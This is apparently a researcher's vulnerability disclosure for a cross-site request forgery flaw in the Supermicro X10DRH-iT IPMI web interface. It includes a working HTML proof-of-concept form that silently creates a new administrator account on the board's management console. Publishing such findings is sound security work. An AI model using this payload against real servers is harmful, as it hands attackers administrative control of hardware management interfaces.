• metin yunus kandemir

Supermicro IPMI WEBGUI Cross-Site Request Forgery

The Supermicro X10DRH-iT motherboards with Bios 2.0a and IPMI firmware 03.40 web interface allows remote attackers to exploit cross-site request forgery vulnerability so that add new admin users.

There isn't a token parameter in request that adds new user with admin privileges.

Assuming that victim user has a authorized session on Supermicro WEBGUI and visits attacker's web page containing the following HTML :

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
      <input type="hidden" name="username" value="JOKER" />
      <input type="hidden" name="original&#95;username" value="2" />
      <input type="hidden" name="password" value="onebadday" />
      <input type="hidden" name="new&#95;privilege" value="4" />
      <input type="submit" value="submit request" />

If the victim user clicks "submit request" button, attacker's page will trigger an http request and add new admin user to Supermicro WEBGUI.

Proof of Concept Video:




Alerting today for a better tomorrow.